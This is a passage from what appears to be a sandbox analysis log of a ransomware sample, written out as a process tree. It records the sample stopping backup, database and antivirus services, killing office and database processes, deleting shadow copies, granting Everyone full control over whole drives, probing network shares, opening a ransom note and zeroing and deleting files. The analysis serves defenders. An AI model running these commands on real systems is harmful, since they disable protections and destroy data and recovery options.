      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:3224
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop sophossps /y
    3⤵
    PID:1892
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop sophossps /y
      4⤵
      PID:2088
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop msexchangeimap4 /y
    3⤵
    PID:1700
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msexchangeimap4 /y
      4⤵
      PID:3096
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$ECWDB2 /y
    3⤵
    PID:2280
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:3200
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop sms_site_sql_backup /y
    3⤵
    PID:624
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop sms_site_sql_backup /y
      4⤵
      PID:3124
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SQL_2008 /y
    3⤵
    PID:2964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:2740
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos MCS Client” /y
    3⤵
    PID:2100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Client” /y
      4⤵
      PID:3156
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop audioendpointbuilder /y
    3⤵
    PID:2924
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop audioendpointbuilder /y
      4⤵
      PID:3252
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:2084
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:3208
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SOPHOS /y
    3⤵
    PID:2912
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:3324
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ARSM /y
    3⤵
    PID:3008
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:3236
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Safestore Service” /y
    3⤵
    PID:2060
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
      4⤵
      PID:3216
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:2684
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:3280
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop swi_filter /y
    3⤵
    PID:2152
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop swi_filter /y
      4⤵
      PID:3260
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$BKUPEXEC /y
    3⤵
    PID:2240
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:3312
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:2416
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:3396
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop svcGenericHost /y
    3⤵
    PID:1812
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop svcGenericHost /y
      4⤵
      PID:3404
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$TPS /y
    3⤵
    PID:2324
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:3388
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop unistoresvc_1af40a /y
    3⤵
    PID:2304
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop unistoresvc_1af40a /y
      4⤵
      PID:3492
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:2432
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:3340
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos System Protection Service” /y
    3⤵
    PID:2260
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
      4⤵
      PID:3456
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLTELEMETRY /y
    3⤵
    PID:664
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY /y
      4⤵
      PID:3448
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop swi_service /y
    3⤵
    PID:2832
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop swi_service /y
      4⤵
      PID:3484
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Message Router” /y
    3⤵
    PID:2976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Message Router” /y
      4⤵
      PID:3500
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop TrueKeyServiceHelper /y
    3⤵
    PID:2920
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
      4⤵
      PID:3680
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecDeviceMediaService /y
    3⤵
    PID:1528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:3568
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$TPSAMA /y
    3⤵
    PID:2288
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:3812
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:2700
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:3708
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:2300
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:3700
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /
    3⤵
    PID:2072
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
      4⤵
      PID:3900
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:1380
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:3752
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop swi_update /y
    3⤵
    PID:2528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:4080
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /y
    3⤵
    PID:2156
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:4000
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop WRSVC /y
    3⤵
    PID:896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:3884
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Web Control Service” /y
    3⤵
    PID:2132
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
      4⤵
      PID:4088
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:872
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:3984
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AVP /y
    3⤵
    PID:2944
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:2860
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mssql$vim_sqlexp /y
    3⤵
    PID:2868
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
      4⤵
      PID:3992
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:2536
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:1524
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop swi_update_64 /y
    3⤵
    PID:2176
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop swi_update_64 /y
      4⤵
      PID:2468
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:2292
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:3376
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop vapiendpoint /y
    3⤵
    PID:2312
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop vapiendpoint /y
      4⤵
      PID:2760
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$PROD /y
    3⤵
    PID:2488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:3636
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:2768
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:2480
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:3036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:804
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SHAREPOINT /y
    3⤵
    PID:2852
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:3928
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:1540
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:4100
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:1096
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:988
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop Antivirus /y
    3⤵
    PID:1964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:2392
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop TmCCSF /y
    3⤵
    PID:2604
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop TmCCSF /y
      4⤵
      PID:2448
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop DCAgent /y
    3⤵
    PID:3016
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:4120
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLSafeOLRService /y
    3⤵
    PID:1036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:4184
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop TrueKey /y
    3⤵
    PID:2284
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop TrueKey /y
      4⤵
      PID:4212
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop tmlisten /y
    3⤵
    PID:2572
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop tmlisten /y
      4⤵
      PID:4192
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLBrowser /y
    3⤵
    PID:2540
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:4176
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:2576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:4132
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLSERVERAGENT /y
    3⤵
    PID:2396
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:4232
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop TrueKeyScheduler /y
    3⤵
    PID:3472
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop TrueKeyScheduler /y
      4⤵
      PID:4304
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3508
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3516
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3524
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3532
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3552
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3624
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3640
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3616
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3608
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3648
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3600
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3592
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3584
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3576
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3560
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3720
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3728
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3736
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3760
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3780
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3768
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3804
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3796
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3788
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3820
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3828
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3836
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3844
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3868
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3892
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3908
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3916
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3932
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3956
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3968
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4032
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:4024
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4008
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4048
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4060
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4072
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2788
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3248
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3296
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:436
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:528
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2752
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3336
- - C:\Windows\SysWOW64\arp.exe
    "arp" -a
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\net.exe
    "net.exe" use \\10.7.0.68
    3⤵
    PID:4368
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:2496
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    3⤵
    PID:564
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.7 -n 3
      4⤵
      Runs ping.exe
      PID:2820
  - - C:\Windows\SysWOW64\fsutil.exe
      fsutil file setZeroData offset=0 length=524288 “%s”
      4⤵
      PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
    3⤵
    PID:1320
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:3308

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-397736069137260643814032166702119225639234000044-14381712858837510914673125"
1⤵
PID:1508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "926047565-73045365-2006964149-1563502552-891139590-1356332111-908110634-1624907816"
1⤵
PID:272

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "377858225-1646507739934747386-1946918413-166297252016715441491226537477836607054"
1⤵
PID:2324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1376091170-1752711824-86991568221072560401818884021-1057853748-382279387-1888604843"
1⤵
PID:2568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-3342161491893366292-1367908683-2102802502-842945483-229056466-831278535-31699839"
1⤵
PID:2896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-68351005317098057661206878465602682971627517057-12111272481403850138534124865"
1⤵
PID:2100

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1766752448-11112234741641378731662745025-2082008783-57954410275230572947148860"
1⤵
PID:3056

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16522290801532845659-1171568132261994351-18593419322003012378-681213493-1241496429"
1⤵
PID:2476

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12948641561463219945-7248315991827913486-56844313-1211826932-1512949328-1227667825"
1⤵
PID:2472

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "897207674-6101183121402268154-9080635601907790171-1714355089-4556947631066422944"
1⤵
PID:2052

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2110384980-201790247-713877588-7072042531327539839-12388431321117229841-1388745906"
1⤵
PID:1948

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "525483392814966287-1363545317-1207276701-703474035280554792313293833772593546"
1⤵
PID:2924

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1683040199-63259639-1373742495326053-1786159832-6509888384391236481330681361"
1⤵
PID:3036

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1342475832-1029891868-2086608761-1779704363-1700752456-1722782848-13546657361506553982"
1⤵
PID:2568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "431548572-749331086-1666408465-1494517572-1194691134-812531646-14523630442015205471"
1⤵
PID:776

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "452244431-1826446067139461821-47272471625247953-4900680831385533608-662291239"
1⤵
PID:2864

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1774910837-12513604781001175084-568269211-954448216-17378560415111793392009851210"
1⤵
PID:436

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1768451818-604261798-379903462-1312761622-1887746384-1040005204-153807947659151636"
1⤵
PID:1348

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "8265093561712158203-1289761204-1085612916714977810-24417519054418943331943724"
1⤵
PID:2172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1792955736-883274299-13587749641962250809-91578201814449180061967826827725008300"
1⤵
PID:1976

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4059676102107705964-5029568331562425180694393576466379361297110448964775799"
1⤵
PID:1580

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2136771936-14334889061387007168-675993557740812991863635461910172645-1720178521"
1⤵
PID:2668

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15321828051107238621-909781334-8528961611756660575-59651767011286206-434713887"
1⤵
PID:3048

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-71873458853023427492817035218176732511236164327-1573284172-534712577-1145243295"
1⤵
PID:2596

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1597386004-61102329417474228101607166161105840097-1821003075583409592-238578536"
1⤵
PID:2880

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-8820711261198244922-426439011-18050188071825837283-907887867-1331214128-454161960"
1⤵
PID:2216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "302288855-751732201-154084979213503465011387619014-1165701839-11594314771259307730"
1⤵
PID:1572

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2091277267744789291029272036-1761450695-2081217884463964335-363369690505662298"
1⤵
PID:3068

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "309512523-10461349112849290691421309796-273536811800432452-173624056-1630595020"
1⤵
PID:1968

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1516104280-1402549396113050076116494675841442037809-3101893121184220684119191360"
1⤵
PID:3040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2013060251-103773797-225848446-1719360228854943833-537462772554368737233949324"
1⤵
PID:3096

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1497247157-133559788395348476340503359-1354482923-1619447272-4352596871087013302"
1⤵
PID:1700

C:\Windows\system32\conhost.exe
